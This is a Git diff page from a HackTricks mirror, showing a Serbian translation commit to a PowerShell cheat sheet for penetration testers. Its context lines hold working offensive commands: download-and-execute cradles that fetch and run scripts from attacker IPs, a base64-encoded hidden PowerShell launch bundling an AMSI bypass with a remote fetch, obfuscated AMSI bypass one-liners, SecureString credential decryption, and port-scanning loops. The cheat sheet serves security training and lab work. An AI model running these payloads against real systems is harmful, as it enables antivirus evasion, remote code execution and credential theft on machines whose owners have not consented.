maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/windows-hardening/basic-powershell-for-pentesters/READM

Browse Source
This commit is contained in:
Translator 2025-01-22 16:13:54 +00:00
parent 2d3a40fa2d
commit 3365aaaed2
1 changed files with 15 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
src/windows-hardening/basic-powershell-for-pentesters/README.md
View File

@ -18,7 +18,6 @@ Get-Command -Module <modulename>
```
## Preuzmi i izvrši
```powershell
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
@ -34,7 +33,7 @@ powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
```powershell
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
```
### Korišćenje b64 iz linuxa
### Korišćenje b64 sa linuxa
```powershell
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
@ -115,11 +114,11 @@ ValueData : 0
```
### AMSI bypass
**`amsi.dll`** je **učitan** u vaš proces i ima potrebne **izlaze** za bilo koju aplikaciju sa kojom možete da komunicirate. I pošto je učitan u memorijski prostor procesa koji **kontrolišete**, možete promeniti njegovo ponašanje **prepisivanjem instrukcija u memoriji**. Tako da ne detektuje ništa.
**`amsi.dll`** se **učitava** u vaš proces i ima potrebne **izlaze** za bilo koju aplikaciju sa kojom interagujete. I pošto je učitan u memorijski prostor procesa koji **kontrolišete**, možete promeniti njegovo ponašanje **prepisivanjem instrukcija u memoriji**. Time se ništa ne detektuje.
Stoga, cilj AMSI bypass-a je da **prepišete instrukcije tog DLL-a u memoriji kako biste učinili detekciju beskorisnom**.
Stoga, cilj AMSI bypass-a koje ćete koristiti je da **prepišete instrukcije tog DLL-a u memoriji kako biste učinili detekciju beskorisnom**.
**AMSI bypass generator** web stranica: [**https://amsi.fail/**](https://amsi.fail/)
**AMSI bypass generator** veb stranica: [**https://amsi.fail/**](https://amsi.fail/)
```powershell
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@ -166,7 +165,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
```
### AMSI Bypass 2 - Managed API Call Hooking
Pogledajte [**ovaj post za detaljne informacije i kod**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Uvod:
Check [**this post for detailed info and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Uvod:
Ova nova tehnika se oslanja na API pozivanje hook-ova .NET metoda. Kako se ispostavlja, .NET metode moraju biti kompajlirane u nativne mašinske instrukcije u memoriji koje na kraju izgledaju vrlo slično nativnim metodama. Ove kompajlirane metode mogu biti hook-ovane da promene tok kontrole programa.
@ -181,12 +180,12 @@ Koraci za izvođenje API pozivanja hook-ova .NET metoda su:
### AMSI Bypass 3 - SeDebug Privilege
[**Prateći ovaj vodič i kod**](https://github.com/MzHmO/DebugAmsi) možete videti kako sa dovoljno privilegija za debagovanje procesa, možete pokrenuti proces powershell.exe, debagovati ga, pratiti kada učitava `amsi.dll` i onemogućiti ga.
[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) možete videti kako sa dovoljno privilegija za debagovanje procesa, možete pokrenuti proces powershell.exe, debagovati ga, pratiti kada učitava `amsi.dll` i onemogućiti ga.
### AMSI Bypass - Više Resursa
### AMSI Bypass - More Resources
- [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
- [Amsi Bypass na Windows 11 u 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
- [Amsi Bypass on Windows 11 In 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
## PS-History
```powershell
@ -227,7 +226,9 @@ $shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
```
## Domen Recon
[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
## Istraživanje domena
{{#ref}}
powerview.md
@ -238,7 +239,7 @@ powerview.md
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
## Sigurna niska u običan tekst
## Sigurna stringa u običan tekst
```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
@ -325,12 +326,12 @@ Test-NetConnection -Port 80 10.10.10.10
"10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
```
### Интерфејси
### Interfejsi
```powershell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
### Vatrozid
### Firewall
```powershell
Get-NetFirewallRule -Enabled True
@ -358,7 +359,7 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,Stat
```powershell
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
### Ping
### Пинг
```powershell
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }